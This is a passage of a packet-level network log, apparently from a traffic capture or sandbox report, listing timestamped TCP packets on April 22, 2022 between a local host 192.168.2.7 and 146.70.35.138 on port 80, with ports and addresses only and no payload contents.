Apr 22, 2022 15:27:18.344521046 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.344541073 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.344547987 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.344564915 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.344583035 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.344603062 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.344624996 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.344654083 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.344680071 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.344697952 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.344702959 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.344726086 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.344772100 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.344796896 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.344813108 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.344825029 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.344841957 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.344964027 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.344990969 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.345005989 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.345015049 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.345030069 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.345031023 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.345055103 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.345069885 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.345072031 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.345097065 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.345097065 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.345141888 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.368489027 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.368733883 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.384358883 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.384401083 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.384418964 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.384439945 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.384465933 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.384481907 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.384506941 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.384532928 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.384546041 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.384547949 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.384586096 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.384598017 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.384623051 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.384639025 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.384675026 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.384700060 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.384773016 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.384798050 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.384813070 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.384833097 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.384838104 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.384871960 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.384875059 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.384891033 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.384916067 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.392765045 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.392951965 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.425606012 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.425728083 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.425769091 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.425801992 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.425831079 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.425858021 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.425875902 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.425906897 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.425906897 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.425950050 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.425966024 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.426018000 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.426044941 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.426059008 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.426069975 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.426100969 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.426114082 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.426155090 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.426155090 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.426203012 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.426248074 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.426249981 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.426295042 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.426337004 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.426361084 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.426366091 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.426412106 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.426420927 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.426465988 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.426491976 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.426495075 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.426537037 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.450453997 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.450664043 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.464291096 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.464303017 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.464329958 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.464349031 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.464365959 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.464379072 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.464396954 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.464437962 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.464452028 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.464468002 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.464494944 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.464500904 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.464515924 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.464652061 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.464725018 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.464745045 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.464802980 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.464843035 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.464871883 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.464879036 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.464895010 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.464910984 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.464946985 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.464965105 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.464976072 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.465003967 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.465040922 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.465080023 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.465095997 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.465106964 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.465131998 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.474427938 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.474591970 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.503791094 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.503837109 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.503859043 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.503886938 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.503930092 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.503935099 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.503959894 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.503966093 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.503988981 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.504003048 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.504101038 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.504237890 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.504303932 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.504386902 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.504419088 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.504448891 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.504457951 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.504477978 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.504482985 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.504534006 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.505230904 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.505280018 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.505289078 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.505307913 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.505347013 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.505371094 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.505390882 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.505412102 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.505434036 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.505455017 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.505469084 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.505546093 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.505577087 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.527733088 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.527823925 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.544512987 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.544568062 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.544596910 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.544639111 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.544661999 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.544701099 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.544708967 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.545233011 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.545286894 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.545330048 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.545341969 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.545378923 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.545546055 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.545604944 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.545607090 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.545617104 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.545708895 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.545715094 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.545759916 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.545798063 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.545809031 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.545855045 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.546144962 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.546216011 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.546246052 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.546284914 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.546309948 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.546390057 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.546443939 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.546451092 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.546478987 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.546499014 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.546525002 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.546571016 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.546603918 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.546608925 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.546619892 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.551635981 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.551785946 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.584644079 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.584686995 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.584705114 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.584732056 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.584752083 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.584791899 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.584825039 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.585397959 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.585433006 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.585467100 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.585475922 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.585484028 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.585501909 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.585505009 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.585522890 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.585545063 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.585568905 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.585577011 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.585623980 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.585632086 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.585697889 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.585833073 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.585899115 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.629539967 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.653682947 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.009407043 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.009474039 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.009495974 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.009526014 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.009552002 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.009571075 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.009596109 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.009603024 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.009619951 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.009640932 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.009650946 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.009659052 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.009743929 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.009845972 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.009874105 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.009891987 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.009917974 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.009924889 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.009931087 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.009968042 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.010001898 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.050602913 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.050656080 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.050677061 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.050703049 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.050705910 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.050729036 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.050734043 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.050746918 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.050755024 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.050774097 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.050777912 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.050798893 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.050817013 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.050817013 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.050834894 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.050852060 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.050860882 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.050884962 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.050903082 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.050921917 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.050940037 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.050966978 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.050997972 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.051022053 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.051047087 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.051054955 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.051064014 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.051079035 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.051099062 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.051106930 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.051116943 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.051135063 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
